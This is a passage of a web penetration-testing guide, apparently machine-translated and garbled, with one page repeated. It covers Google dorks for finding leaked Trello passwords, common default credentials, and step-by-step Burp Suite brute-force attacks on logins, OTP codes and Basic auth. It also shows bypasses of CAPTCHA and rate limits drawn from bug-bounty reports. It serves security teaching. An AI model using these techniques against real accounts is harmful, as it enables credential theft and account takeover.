In the third case, the discussions will be more in-depth with the use of Google dork who
different. As seen in the two previous cases, executions were carried out with the use of
dork "inurl" which means that the search is done against specific keywords that might
currently on a link (such as GET Method).
But if it is possible when a search is performed by checking the "body" or "content"
of a site? The answer is, yes, it's possible. This in itself is evidenced by a
researcher named Kushagra Pathak when showing how to obtain "sensitive data"
Trello users by utilizing a simple Google dork ,
As used namely dork dork " intext "Which has the intent / purpose to know
the possibility of keywords entered in a body / content exists in a
portal. As an example, namely:

Weather | 67
inurl: https://trello.com AND intext: @ gmail.com AND intext: password
inurl: https://trello.com AND intext: ftp AND intext: password
inurl: https://trello.com AND intext: ssh AND intext: password
As for the explanation of each line are:
• The first line has a purpose to find content that charged password for accounts
domain wear @ gmail.com.
Figure 67 Information Disclosure via Google Dork - Intext Dork I
• Then the second and third row has the intent to find content that charged password
of the FTP service (left) and SSH (right).
Figure 68 Information Disclosure via Google Dork - Intext Dork II

Weather | 68
On that occasion, Kushagra also conduct further searches and obtain information
other sensitive information such as fixing bugs in a company as well as the password used
to access many services such as panels and database administrators.
Figure 69 Information Disclosure via Google Dork - Bug Fixing
Figure 70 Information Disclosure via Google Dork - Sensitive Credentials I
Figure 71 Information Disclosure via Google Dork - Sensitive Credentials II

Weather | 69
Thus, it can be seen and verified that the information contained in a
body / content of an application can be "traced" further with the use of a dork that
right (of course, as long as the application is not yet applied in maintaining content protection
sensitive therein - for example not be given protection in the form of a session).
9.5. Crawling Bot Prevention against It Sensitive
When a directory, of course, this can be "prevented" by using robots.txt. however
Thus, the use of robots.txt is in itself not a guarantee that the bots will obey
so it is not crawling.
Based on the information provided Abdilah references about robots.txt portal, in section
FAQs (frequently asked questions) about the "Can I block bad Robots?" , Disclosed that
in practice, it would be difficult to prevent the presence of "bad robot" for crawling.
"If the bad robot obeys /robots.txt, and you know the name it scans for in the User-Agent field. then
you can create a section in your /robotst.txt to exclude it specifically. But almost all bad robots ignore
/robots.txt, making that pointless. "
Nevertheless, it is still good enough for use in preventing search engines
integrity as well as Google, Microsoft, and others.
Later, when dealing with the GET method, then Google has specifically delivered
that developers should add a "meta" noindex tag (in a directory that is not blocked by
robots.txt).
"Important! For the noindex directive to be effective, the page must not be blocked by a robots.txt
file. If the page is blocked by a robots.txt file, the crawler will never see the noindex directive, and the
page can still Appear in search results, for example if other pages link to it. "
Here is an example:
<Meta name = " robots " content = " noindex ">
Thus, developers have prevented the majority of bots to perform indexing on
content contained in his application.

Weather | 70
9.6. Reference Information Disclosure via Search Engine
Here are a few references that could be a reference to complete explanation
related to this discussion:
• How Search Engines Gather and Organize Data: https://www.dummies.com/web-design-
development / search-engine-optimization / how-search-engines-gather-and-organize-data /
• Bot Directory: https://www.distilnetworks.com/bot-directory/category/search-engine/
• List All Users Agents from Top Search Engines: https://perishablepress.com/list-all-user-agents-
Top-search-engines /
• Google Dork Query: https://whatis.techtarget.com/definition/Google-dork-query
• Google Hacking Database: https://www.exploit-db.com/google-hacking-database
• Block search indexing with 'noindex': https://support.google.com/webmasters/answer/93710
• Microsoft Yammer OAuth Token Bypass Vulnerability: https: //www.vulnerability-
db.com/?q=articles/2013/08/04/microsoft-yammer-%E2%80%93-oauth-bypass-token-
vulnerability
• Information Disclosure at PayPal via Search Engine: http://firstsight.me/2017/12/information-
disclosure-at-paypal-and-Xoom-paypal-acquisition-via-search-engine /

Weather | 71
ACCOUNT AND PASSWORD
MECHANISM

Weather | 72
10. BRUTE FORCE ATTACK - CHECK Weak LOCK OUT MECHANISM
This section will be a little repeat some discussion that has been described in the "Summary
basic test "earlier ditentunya equipped with the basic meaning and the techniques used.
10.1. Simple meaning of Brute Force
Quoted from Kaspersky Resource Center, Brute Force is basically an attack
is "trial error" in an attempt to try to obtain a valid value of a target of such
a combination of a username and password, directory "hidden" in an application, or perhaps
key to decrypt a value.
Specifically, this attack is more often associated with the experimental "trial error" in combination
username and password making it possible for an examiner may enter into a
the other system.
10.2. Why should Account and Password? - Google Case
Account and password is one of the main door which can be met by an examiner
(Or attacker in a real scenario) well when faced with an application that is generally
client-server (web, mobile, or desktop).
Has become a reality that is hard to be denied when there are still many developers / maintainers
a system that still uses the account and password that are weak. The reason
quite varied, such as:
• The tight release schedule (thus using the account and password that is weak for easy
management prior to release). Generally, the manager is going to inadvertently
be sure to replace it when an asset has been released (goes into production). In
the other hand, there is the presence of the control to not use all the dummy data on development
became one of the factors that ultimately separate "support" this issue arises.
• The different disciplines' knowledge between developers / managers to testers. It is also commonplace
found because the mindset formed from each area were quite different.
Generally, the "support" in the form of a lack of security awareness can also lead to
developers / maintainers are not aware of the risks that can happen to him when he was
using your account or password is weak.
With the provision of the use of vulnerability at this point, the tester also has a step more

Weather | 73
close to be able to fit into an overall system.
In the reality, the development of workflow / attack scenario can be connected to the side such as:
• Web-based applications: such as gender issues related to the File Upload, SQL Injection (when logged in) to
associated with the reading of sensitive files (when the use of databases in a mode that
can read files in the internal), as well as other similar terms that allow reading
or communication with the data contained in the operating system.
• Desktop-based applications: in this situation, can we kerucutkan into services
commonly found as outlined above. The subsequent scenario can
such as reading the sensitive files (via SSH / FTP / like) that can be used to
entry into other assets contained in the system.
Then, whether this should be a major Notice the of the testers? The answer is yes. Because
even the large companies will have a potential problem as such. One of the best examples
interesting is one researcher writing called "Vishnu Prasad PG" on account of his Medium ,
To shorten, will be quoted a few snippets of his writings as follows:
A Appeared with HTTP login page in front of me. Whoa! I never expected to see that!
So, there was a log in front of me, possibly the door to the inside of one of the most powerful
companies in the world. However, I needed a username and password to get into it.
So, what do I do?
I tried clicking the LOGIN button without entering any credentials at all.
To my surprise, a page with many buttons and options Appeared in front of me. It took me a minute
to Realize that I am inside a Google product's Admin Panel.
I am in!
It is noticeable that companies such as Google also has the potential for similar problems. then it can be
concluded that although simple, it would be wise if something like this does not escape to the test
which is conducted.
10.3. Common Usernames and Passwords
In the implementation, there are several accounts and password combination that is generally
used to log into the system. As for some examples are as follows:

Weather | 74
No. usernames passwords
1. adm All contained in a username into password
2. admin <Blank password> / without password
3. admin P @ ssw0rd (with P large and small)
4. administrator P4ssw0rd (with P large and small)
5. 4dm1n Passw0rd (with P large and small)
6. 4dm1n1str4t0r Qwerty (with Q large and small)
7. root 1qazxsw2 / zaq12wsx
8. sa 12345 (and combinations until the number 0)
As well as the default password associated with

ness is enforced / nama_jalan
name of a specific product, such as:
9. / App_name /
https://cirt.net/passwords
nama_departemen / nama_pic
http://www.phenoelit.org/dpl/dpl.html
10.4. Basic Brute Force Attack (Kind of Brute Force Attack)
10.4.1. Basic Brute Force Attack Part I - Direct Attack to Password
As a first step, then this guide will discuss first the basic steps
to automate the input of the password varies.
As is known, a login form basically consists of columns that can be used to
enter the username and password that is owned. However, to perform brute force
with the automatic, the examiner will require tools such as interceptor and forwarder burpsuite
first to be able to see the "patterns" that are sent.
On the occasion of this section, the discussion will be focused on the activity of brute force by POST
Method (certainly not be a problem if it were found to GET Method).
As an experiment, then re-access the link http://testphp.vulnweb.com/login.php , After
open, then masukanlah arbitrary password (invalid) into it and
paying special attention to catch on Burp Suite.

Weather | 75
Figure 72 POST Method - Username and Password
From the pictures, it appears that there are two parameters passed (POST Method) when
a user is about to log in, the parameter " uname "As a marker username (the name
users), and the parameter " pass "As a marker of a password (password).
Should be noted that the "value" of "parameter" can vary according to the
development undertaken by each programmer.
As already obtain this pattern, then the "carry" pattern referred to the "intruder" (Send to
Intruder) with a "right click" on an existing request.
Figure 73 "Send to Intruder"
Afterwards, go to the "intruder" who finished 5th from left part Burp Suite version 1.7
used. From here, it would seem a simple look that will not be changed because it is already
automatically taken from the "throw" earlier in the proxy.

Weather | 76
Figure 74 Intruder Menu - "Targets" Tab
The next thing that needs to be done is to select "tab" Positions to set things
about to be automated.
Figure 75 "Payload Positions"
On the tab "Payload Positions", testers will again confronted to several functions. when observed
Further, there will be some parameters that are highlighted with a dollar symbol ($). In short,
$ Has a purpose as a marker that must automate.
A simple example of the image that is the value of the parameter uname and pass by $$ (in this case
namely $ test $ and $ password $). Why is the value of the content is "test" and "password"? Since both
the value of the content that is included when the test the first time (remember the previous page).
To facilitate the tests in this section, then select "clear $" beforehand so that no more
parameters are highlighted with a $.

Weather | 77
Figure 76 Remove Highlight the "Clear $"
After its parameters is no longer that highlighted, now specify parameters
want in-brute force. Of course, in this scenario, the parameter is a parameter referred to "pass".
Figure 77 Highlight Parameter "Pass"
If so, then into the tab "payloads".
On this tab, you will see again some of the features that can be used. Given that the
about to be discussed is his concept (not his tools), then the discussion will immediately refer
against the execution step.
In the "Payload Options", there is an empty field with the words "enter new item". On
This situation, testers can enter manually one by one word you want to be used as a dictionary.

Weather | 78
Figure 78 Adding a "word" Manual
Or you can also add words from the dictionary that is already available. As an example,
there is a file that contains a "dictionary" of the words that might be used as a password.
So, the thing to do is to include this dictionary into tools through a button
"Load" is available.
Figure 79 Adding a Password Automatically from a File

Weather | 79
And automatically, all of the text contained in the file will be entered into the list of the
will be "fired".
Figure 80 Password successfully Added
Should be noted that each password must be separated by a line break.
Figure 81 Sample Files containing Password
When all was done, then the next thing is to run attack
execute button " Start Attack ".
Figure 82 Starting Attack "Start Attack"
When the attacks are carried out, then automatically, Burp Suite will send a request alternate
in accordance with the given password dictionary.

Weather | 80
Figure 83 Auto Brute Force Attack
On the left, we see that there are experiments which certainly based dictionary earlier.
Then, how do I know that an experiment has succeeded or failed?
Simple things that can be seen to determine the success or failure of this
is of "response length". From the experiment, there are at least 10 (ten)
request that produces a similar response length, amounting to 221. Then in
trial to 11, appears a significant response sufficient length, ie sebesasr 5365.
Of the existing situation, it can be concluded that it is likely, password
entered in the trial to-11 is correct.
Then why say most likely? Simple, because it may turn out it is
response of apps that have implemented restrictions against a brute force trial
a valid account that different failure response when an account has not been blocked.
To be sure, the examiner can immediately try manually logging into the portal
that is, with the username "test" and password "test".
Long story short, the examiner must have successfully logged on since its data is valid, nor are
restrictions on brute force trial.

Weather | 81
Figure 84 Successful login on the results of Brute Force
10.4.2. Basic Brute Force Attack Part II - Page Redirection
There are times when an application does not directly emit different valuable response when a
username and password are valid input. In this case, the intended application will give
response to redirect first, then taken to a dashboard upon login.
When they met in this situation, then there is the value of the response of the first request would
always the same, both for the account valid or not valid.
A simple example is such an application " Damn Vulnerable Web Application ". By default, the account
which is used to log into a web application is admin (username) and password (as
password). But when the brute-force attack was launched, the value of its length response has always been
at the same rate, ie 435.
Figure 85 Username and Password is worth Valid

Weather | 82
In anticipation of this, the tester features "redirections" on Burp Suite available
The "Options" tab in the "Intruder".
With the same steps as mentioned earlier (ie of determining
parameter which you want to enter a brute force dictionary that contains a list of passwords),
then continue by selecting the tab "options" is.
Figure 86 "Redirections" Options on the Burp Suite
After that, go on to select "Always" in the "Redirections". The simple purpose
Burp Suite is for processing the request automatically when initial response of an application
require that requests the user to get to the 2nd (or n-th) to be able to obtain
response be logged into the application.
When executed, the result of brute force will reveal the differences:
Figure 87 Response after Set Page Redirection

Weather | 82
In anticipation of this, the tester features "redirections" on Burp Suite available
The "Options" tab in the "Intruder".
With the same steps as mentioned earlier (ie of determining
parameter which you want to enter a brute force dictionary that contains a list of passwords),
then continue by selecting the tab "options" is.
Figure 86 "Redirections" Options on the Burp Suite
After that, go on to select "Always" in the "Redirections". The simple purpose
Burp Suite is for processing the request automatically when initial response of an application
require that requests the user to get to the 2nd (or n-th) to be able to obtain
response be logged into the application.
When executed, the result of brute force will reveal the differences:
Figure 87 Response after Set Page Redirection

Weather | 83
As seen in the figure, there are two requests and two responses from the attack.
The details are more or less as shown in the following flow:
Figure 88 Sample Flow Simplified
• first request a request that contains a username and password.
• first Response contains a page redirection to get to Request 2;
• Request 2nd contains two conditions, namely the acquisition of the session because it has been successfully logged with
valid credentials or rejection for failing to enter valid credentials;
• Response to the 2nd contains views obtained which will be seen from the request condition 2, ie
view dashboard upon login (if his credentials are invalid) and the login form again (if
Her credentials are invalid).
When viewed more closely, then there is a fairly significant difference between the failed attack
and a successful attack, which is worth 1654 (for failed) and is worth 4972 (for success).
Figure 89 Response Length - Failed and Success
Should be noted that in reality, there is just a different response value though
equally failed. But of course there is no central point that can be drawn,
for example, by playing a certain range.
On the other hand, there is the ease to make the detection if it turns out there are hundreds or
perhaps thousands of requests. Testers only need to use the "sort" which is available on the display
These attacks and choose to download the sort "response length" between from big to small or small to
large (because there is no certainty that a successful login surely give more length response

Weather | 84
compared with the failed login).
Click - Column Header for

Sorting
Figure 90 Click to Sort
On the other hand, the examiner can perform checks on "response body" appears. As
For example, each response fails, the application will provide information "failed". Thus, testers
simply find the location of the body response that does not have the word failed in it (of course, after-sort
if you have hundreds or more experiments).
Figure 91 Example of Response Fail - Login Failed on the "Body"
Figure 92 Example of Failed Login - "Failed" at "Response Body"

Weather | 85
10.4.3. Basic Brute Force Attack Part III - Numbers as Payload - Facebook Case
In addition to dealing with such characters uppercase and lowercase letters, there are times when brute force is also
done in the form of numbers. This generally occurs on the activity to "pull out" themselves from
features OTP (One Time Password) is a number (eg, four to six digits) on the portal.
One example of this is seen in the situation when there is a researcher named
Anand Prakash who managed to find the issue on Facebook which has not made the limitations of brute
attempt to force the OTP feature applied in beta.facebook.com portal and
mbasic.beta.facebook.com.
On that occasion, Anand found that the portal might be committed to login,
but the OTP feature is applied in it have not actually correspond to the main state
(Ie in-limit when it reaches a certain number of failures).
Long story short, by brute force (payloads: number) the parameter "n" until finally
find the value sent by Facebook to the victim's cell phone number, then Anand was
successful entry into someone's account are "protected" by the OTP feature.
POST / recover / as / code / HTTP / 1.1
Host: beta.facebook.com
lsd = AVoywo13 & n = xXXXX
As for the implementation of this case, testers can re-use the Burp Suite.
With the provision of the same steps of the intercept request, "throwing" the request referred to fashion
"Intruder", to give a "sign" (in the form of $$) in the parameter which you want to brute
force, testers only need to replace "Payload Type" in the "Payload Sets" to "Numbers".
Figure 93 Changing the "Payload Type" to Numbers

Weather | 86
Afterward, testers only need to enter the numbers of the (from) up so (to). The
regulated mode is the mode "sequential" that brute force will be carried out sequentially
of the value of the "from" value to the "to".
Figure 94 Inserting "Number Range" in the "Payload Options"
"Without re-discussed on page redirection or not" ( as discussed in
previous subsection), when all arrangements have been completed, then do execution by choosing
button "Start Attack".
Once executed, the brute force process will start automatically as shown in the picture
following.
Figure 95 Brute Force Attack - "Numbers" as Payloads
Just as outlined above, to facilitate knowledge will succeed
whether or not an execution, then the tester can perform sorting of the length of existing response.

Weather | 87
10.4.4. Basic Brute Force Attack Part IV - Two or More Payloads
In the previous sections, it can be seen that the activities carried out by the brute force
A parameter value. In other words, the situation is recalled that a tester has to know
the value of the username person who made the object of a test or a live examiner tries to
"Guess" OTP value (a number) that is given.
However, there is one question that arises, if possible if steps
This attack was also carried out on two or more parameters in a request? answer
yes. When an examiner not know a username and password from the intended target,
then both are allowed to be brute force.
Examples of execution is quite simple. As was done previously, intercept a
trial request login and "throw" the request referred to the intruder. On this occasion, returned
will be used portal http://testphp.vulnweb.com/login.php ,
Figure 96 Request for Login Activity
Due to this condition the testers do not yet know the value of the parameter valid uname (username)
and pass (password), then surely both must be marked (highlight) for in-brute-force with
Dictionary held later.
In this view, the testers were required to change the "Attack Type" to "Cluster Bomb"
so Burp Suite will change the mode brute force of which was only valid for one
parameter (with "Attack Type" "Sniper"), be applicable to many parameters (with
"Attack Type" "Cluster Bomb").
Afterwards, go to the menu payloads as usual to be able to enter the dictionary that was about

Weather | 88
used. In these situations, the examiner will again see little change in the "Payload Set" in
the "Payload Sets".
Figure 97 Total of Payload Set
Long story short, because there are two parameters that are going to "look for" value by means of brute
force, then the payload from the Burp Suite set any "give" a place for testers to enter the dictionary
on each payload means one payload represents a parameter (valid when
"Attack Type" of "Cluster Bomb" is enabled).
To continue the test, the tester measures needs to be done is to include a list of
username in the "Payload is set to" 1 (one), and enter the password list on "The payload is set to" 2 (two).
Figure 98 "Payload Set" 1 - Setup the List of Username

Weather | 89
And here is an example of a list of passwords to be sent:
Figure 99 "Payload Set" 2 - Setup the List of Passwords
In the "Payload count" and "Request count", the examiner will see different values. This matter
because the number of username entered is three (3) and each will
try the password 4 (four). Therefore, the value of the "Request count" is 12 (two
mercy).
Once fully completed is prepared, then run the executable as usual with the "Start Attack".
Figure 100 Sample of Request with Two Payloads Set

Weather | 90
In the picture, it can be seen that the Burp Suite will perform alternately request of
one username to another username.
And here is the end result of the execution of twelve (12) "Request count" there
(Ie with three username and four different password).
Figure 101 Sample of Request
Thus, the examiner would be easier to do a brute force in time
not yet know the value of a username or password, or both.
10.4.5. Basic Brute Force Attack V - Encode the Payload - HTTP Basic Authentication
In the reality, the HTTP authentication process has several schemes that have become standard,
such as "Basic", "Bearer", "Digest", and others as described in Mozilla's portal
developer , Implementation of sending credentials on each of these schemes is quite
diverse. As an example of the HTTP "Basic" authentication.
When a common format known to be quite a lot of users is the parameter's credentials (both username
or password) inserted either in the URL or in the POST data, for HTTP Basic
Authentication alone, these credentials delivery (such as username and password) is inserted in

Weather | 91
header of a request that is converted into base64 format.
When it finds that the format of the credentials submitted was not worth the public (plaintext
as usual), of course there will be little change of pace when they wanted to do a brute
force attack against a target that is used in the form of HTTP Basic authentication scheme.
A simple example, a user has a username and password are both equally
worth "admin". In the HTTP "Basic" authentication, credentials delivery format will
be as follows:
GET / login HTTP / 1.1
Host: target.com
Authorization: Basic YWRtaW46YWRtaW4 =
In detail, the value YWRtaW46YWRtaW4 = basically represents the value of the "admin: admin" (without
quotes - the first admin as username and admin both as a password) that
converted to base64 format.
Seeing this, it will be problematic when it turns out all of the data dictionary
username and password will be owned by the examiner, must be changed manually to base64 format
on targets that use HTTP authentication scheme "Basic". To deal with problems
No, then the tester can use the payload type "Custom Iterator" on the menu "Payload Sets" in
Burp Suite.
To start off, "throwing" the request which you want to brute force to intruder mode (in this case is
an HTTP request using the "Basic" Authentication). Then highlight (mark) parameter
BASE64-value in the header of the request that is.
Figure 102 Highlight the Base64 Parameters

Weather | 92
Afterwards, go to the tab "Payloads" and change the "Payload Type" in the "Payload Sets" to be
"Custom Iterator".
Figure 103 Setup the Payload Type to Custom Iterator
Then, enter the username as the value of the first parameter (the "first position") and
add delimiter (separator) in the form of a colon ":" as shown in the following figure:
Figure 104 Add the Password and Separator
Afterwards, continue by moving to "position 2" to enter the password list
be used.
When completed, the display will be as follows:

Weather | 93
Figure 105 List of Passwords
For "position 2" is, do not add a colon anymore. Because its data format is
username: password means that only require one form of colon separator.
When it was finished entirely implemented, then setting to enter the username and
password separated by a colon, has been successfully carried out. However, given that the "content"
received must be base64, then there is one more step that must be done testers,
namely by adding a "rule" in the Burp Suite so that the process will be conducted in accordance attack
the rule in question.
On this occasion, the examiner should lead to the feature "Payload Processing".
Picture 106 "Payload Processing" Feature

Weather | 94
Steps to be executed testers on this feature is to add a provision
( "Rule") in the form of "Encode" to "Base64-encoded" as shown below:
Figure 107 Add Payload Processing Rule - Encode to Base64
Figure 108 Encode to Base-64

Weather | 95
And because in general format base64 characters containing the "equals", then
that needs to be done next is to "throw" the sign "=" in the features "Payload
Encoding ".
Figure 109 Normal - With "="
Figure 110 Remove the "="
When you do not want to "dumped", then simply uncheck the "URL-encode Reviews These characters".
When the whole has been completed is set, then the next step needs to be done testers are
choose "Start Attack 'to execute the attack.
In the execution results, it would seem that every parameter which is input, is converted directly to
base64 format.
Figure 111 Parameter was Encoded to Base64
To be sure, the testers can try to decode one by one the existing value
with the "Decode" on Burp Suite.

Weather | 96
Figure 112 Decode Result - Burp Suite
10.5. Bypassing Brute Force Protection (Kind of Brute Force Bypass)
10.5.1. Bypass Method Part I - Bypassing CAPTCHA Protection
No doubt that one of prevention against brute-force attacks are commonly known
by the developers is to add a CAPTCHA. The use of this CAPTCHA
itself is quite varied, which is nothing that makes its own (custom built), some use
third-party plugins, and the most common is by using CAPTCHA-owned
Google. Regardless of the pros and cons in the use of each, of course, a portal
using CAPTCHA can not be said to have "liberated" from brute-force attacks Attack.
10.5.1.1. definitions CAPTCHA
In meaning, CAPTCHA stands for "Completely Automated Public Turing test to tell
Computeres and Humans Apart ". Simply put, this feature is often used to be
distinguish between an activity undertaken by a human computer. (This will
remind examiners of a thing about belonging Turing test that also aims at.
Pretty fundamental difference is, this test is done by a computer, so often called
as Reverse Turing Test).
In application, this feature requires one simple step that should be performed by users
such as typing a few letters appear on the picture or choose a suitable image
with instructions delivered

Weather | 97
10.5.1.2. Common Request with CAPTCHA
When a user wanted to log into the application that has been granted protection in the form of
CAPTCHA, then it is a "must" for these users to make sure that
"Character" / "options" that "desirable" by CAPTCHA, can be "conveyed" fine.
As an example of the use of Google's CAPTCHA requires the user to choose
the exact image that corresponds to the "request".
Figure 113 Sample CAPTCHA by Google
In the situation shown in the image, the user is required to select the image contained
bike in it. When it is complete and correct, then the user will be "allowed" to
continuing its activities, for example such as login, registration, or other activities
coupled with the existing CAPTCHA feature.
In the process itself, when users perform an "action" which was paired with
CAPTCHA from Google, then automatically, the application will send a request in the form of some
the parameters of the main action (such as usernaname and password) that is accompanied by
parameters of CAPTCHA named: " g-recaptcha-response ".

Weather | 98
Here is an example login with any of the applications that have been implemented
Google CAPTCHA intended to resist brute force attacks.
Figure 114 Sample Request with g-recaptcha-response
Need to be informed that the value of the parameter g-recaptcha-response itself is given by
automatically from Google when users have "chosen" in accordance with the request ditampakan
(As an example of selecting the image bicycle).
When the value of g-recaptcha-response does not match the "expected", then automatically,
the value of CAPTCHA would be considered inappropriate and the user will be asked to return
"Dealing" with CAPTCHA until a valid value.
10.5.1.3. Execution example Bypass CAPTCHA - Veris Case
Is it possible for a bypass CAPTCHA testers from Google? In real,
certainly is not easy to remember that testers should definitely break the algorithm
CAPTCHA used by Google. However, it is a trick, it is possible with notes
certain as in Veris belong case encountered by a researcher with the nick name
bugs3ra ,
From this case, it can be seen that although an action on the application associated with
CAPTCHA, in reality, togetherness between the action associated with this CAPTCHA was not always
well connected. In other words, the parameters passed by the CAPTCHA not rated
Mandatory (must) by the system so that it can be bypassed to allow a tester
can perform a brute-force Attack freely.
Then what should be done? Simply put, testers only need to intercept the request
when have to log in and fill out a CAPTCHA correctly, then remove the parameter g-recaptcha-
response (or other similar parameters that apply within the application). Afterwards, send
request referred (without parameters CAPTCHA). When the action on the application has not been connected to the

Weather | 99
CAPTCHA well with the parameters indicated, automatically, CAPTCHA will be bypassed
and testers also could launch a brute force attack freely.
Here is an example of CAPTCHA requests with parameters:
Figure 115 Request with g-recaptcha-response
Then, the following is an example of CAPTCHA requests without parameters:
Figure 116 Request without g-recaptcha-response
For the record, to start the parameters, then the examiner should remove it from
character & followed by the parameter name. Example: & g-recaptcha-response.

Weather | 100
And the following is an example of the execution of a bypass in case Veris:
Figure 117 Removing the g-recaptcha-response - https://hackerone.com/reports/124173
10.5.1.3.1. Burp Suite - Repeater Mode
There are times when a process of trial error deletion request will be somewhat difficult to do with
constantly be on the tab "intercept" belongs Burp Suite. Because in reality, the examiner will
exposed to refresh / request again through the browser, followed by
back to the "intercept" the Burp Suite repeatedly.
In anticipation of this, then technically, testers can continue to try to do a trial error
(Without difficulty because the pacing to the browser and Burp Suite) using
mode "repeater" from the Burp Suite.
The process itself is actually not much different from that has been described when testers wanted
"Throws" to the request mode "intruder". The difference is, this time testers must be tossed
mode to the "repeater".
Figure 118 Send the request to Repeater

Weather | 101
After selecting the "Send to a Repeater", then automatically, the request in question will appear on the tab
"Repeater".
Figure 119 Interface of Repeater Mode
As seen from the current view, testers can leluasan for sending request
and see the response on one screen only. Thus, the examiner was so easy to
modify / delete parameter / parameter contents and send it directly to the server.
The delivery of request can be done by selecting the button "Go" located next
top left. And one of the best things is, testers can have multiple tabs that can be
representatives of the specific request that was about to be analyzed as shown in the following figure:
Figure 120 Many Tabs to be Analyzed

Weather | 102
10.5.2. Bypass Method Part II - Added Custom Header - Dashlane Case
In the application, in addition to using CAPTCHA, there is also a method to prevent attacks
Brute Force by limiting the error log as much as a certain value (eg, six times
in accordance with the PCI DSS requirement).
One example that is as it has been applied by Dashlane on one portal
located in ws1.dashlane.com hers. At that time, Dashlane will do blocking when
There are many times request (Brute Force) to the specified value.
However, there is a researcher with nick corb3nik successful bypass
for the protection meant to add a custom header (In the form of X-Forwarded-For) on
existing request.
Quoted from Mozilla's developer portal, basically, X-Forwarded-For used for
identify an original IP address of the client who want to communicate to the server via HTTP
Proxy or Load Balancer. Generally, when we want to see oncoming traffic from the client to the server,
then only the IP of Proxy and Load Balancer are detected by log. but with
Award "X-Forwarded-For" header, then the user's real IP will be known.
By utilizing the "X-Forwarded-For", then corb3nik finally managed to bypass
Brute force protection applied by Dashlane. Step is made by
add headers referred to in the request that is sent from the application to the server.
Here is an early feature when faced with the blocking corb3nik login:
Figure 121 Attempt was Blocked by Dashlane
And the following is a description of the addition of the "X-Forwarded-For" in the header of the request
shipped with the purpose to bypass the brute force protection has been applied.

Weather | 103
Figure 122 Bypassing Brute Force Protection at Dashlane - https://hackerone.com/reports/225897
This vulnerability itself is considered valid by Dashlane and repaired less than 7 (seven) days.
10.5.3. Bypass Method Part III - Check the Mobile Request - Instacart Case
In certain situations, there is a possibility that there is a difference whether it is done via request
web browser or mobile application.
In this situation, a researcher with nick cablej has proved herself successful
bypass the brute force protection on Instacart by utilizing the request on the mobile
application owned.
Steps taken are not much different, namely:
• By performing an intercept to a request from the mobile application owned (when it is found
that form POST request addressed to https://www.instacart.com/oauth/token ;
• Then proceed to send it to the intruder mode;
• Afterwards, cablej also perform a brute-force through the request in question and found that
endpoint designated by the mobile application owned Instacart yet to implement prevention
against brute force attacks.
From here, it can be concluded that the endpoint between accessing an application via web
browser (desktop) with a mobile application, can have different requests. Therefore,
examination of each access is a necessity of its own that need to be
will identify potential risks that exist in an application.
Note: remember that this guide is not to discuss the intercept data traffic on
mobile application, then the discussion would not be detailed to intercept steps intended.

Weather | 104
10.5.4. Bypass Method Part IV - Check the API - Asus Case
This case is actually not much different from that found in Instacart case. Things become
difference is bypass process against brute force attacks on the Portal Asus done
API trace information (Endpoint, key, etc.) used by Asus that ultimately di-
request directly to the endpoint in question.
Asus basically already have protection against brute force at his login portal. This matter
itself can be seen from the CAPTHA implemented on the page in question.
Figure 123 CAPTCHA at Asus Portal
However, this CAPTCHA alone in the end can be bypassed by utilizing APIs
used by some applications (based on Android) Asus's other (such as Baby and HiVivo Vivo).
At that time, it was found two Android-based mobile applications is not yet in-obfuscate so
allows an examiner to study the existing flow. Long story short, the results decompile
to the mobile application in question, obtained information such as APIs used (from the key to
its endpoint).

Weather | 105
Figure 124 API-ID at Asus VivoBaby Mobile Application
Figure 125 API endpoints at Asus VivoBaby Mobile Application
Thereafter, the tester was immediately visited the endpoint obtained from the decompiled
(Located on the links https://account.asus.com/ws/awscusinfo.asmx ) Followed
by entering the data obtained previously.
Figure 126 Endpoint to Login - Belong to Asus

Weather | 106
Once filled with either for all parameters are required, eventually meant any request
in-intercept using Burp Suite for further analysis.
Figure 127 Trying to login from Asus API
From this analysis, it was found that it is true if the endpoint is able to "bypass" protection
CAPTCHA that has been implemented by Asus on his login portal.
To be sure, the process was done through brute force mode "intruder" on Burp Suite
and finally proved when an attack can be launched properly.
The following is a response from the application when it was found that the password that are input
an incorrect password.
Figure 128 Failed to login - Response Length 752 - Failed
And here is the response of the application when it was found that the password that are input
is the correct password.

Weather | 107
Figure 129 Success to Log - 1106 Response Length - Valid
Note: remember that this guide has not discussed the activities of the mobile decompile
application, then the discussion would not be detailed to the intended step.
10.6. Reference Brute Force Attack
In the reality, the application of brute force attacks and methods to bypass its own does not
limited to a concept that has been presented in this guide. As an example, namely the presence of
process bypass brute force by the turn of the IP (as evidenced by the researcher
named atruba on proprietary platform Weblate) ,
However, if only the concepts that have been described are expected to have been able to
describes the basics needed to execute or bypass types
existing attack.
As a complement to the existing explanation, here are some references
can be brute-force-related reference discussion:
• Definition of Brute Force Attack: https://www.kaspersky.com/resource-center/definitions/brute-
force-attack
• What is a Brute Force Attack: https://www.varonis.com/blog/brute-force-attack/
• Bypassing Google's authentication to Access Their internal Admin Panels:
https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-
panels-12acd3d821e3
• Vulnerable Demonstration Site by Acunetix: http://testphp.vulnweb.com/login.php
• Damn Vulnerable Web Application: http://www.dvwa.co.uk/

Weather | 108
• Every Hacked Facebook Account with Bypassing the OTP via Brute Force Attack:
http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html
• [Video] Every Hacked Facebook Account with Bypassing the OTP via Brute Force Attack:
https://www.youtube.com/watch?v=U3Of-jF1nWo
• The 'Basic' HTTP Authentication Scheme: https://tools.ietf.org/html/rfc7617
• The general HTTP authentication framework: https://developer.mozilla.org/en-
US / docs / Web / HTTP / Authentication
• HTTP Authentication: https://www.httpwatch.com/httpgallery/authentication/
• A set of HTTP / 1.1 features: https://jigsaw.w3.org/HTTP/
• Payload Processing (Rules and Encoding) at Burp Suite:
https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/processing#payl
oad-processing rules'
• HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite:
http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-
attacks-with-burp-suite /
• Use the Burp Suite to brute-force the HTTP Basic authentication: https://securityonline.info/use-
burp-suite-brute-force-http-basic-authentication /
• Veris - Bypassing CAPTCHA by Removing the CAPTCHA Parameters:
https://hackerone.com/reports/124173
• Instacart - Bypassing Brute Force Attack Prevention by using Mobile Request:
• Dashlance - Login Attempt Bypass (Bypass Throttling) by Adding the X-Forwarded-For header:
• X-Forwarded-For header: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-
Forwarded-For
• Asus - Bypassing CAPTCHA by using Mobile API: http://firstsight.me/2017/12/lack-of-binary-
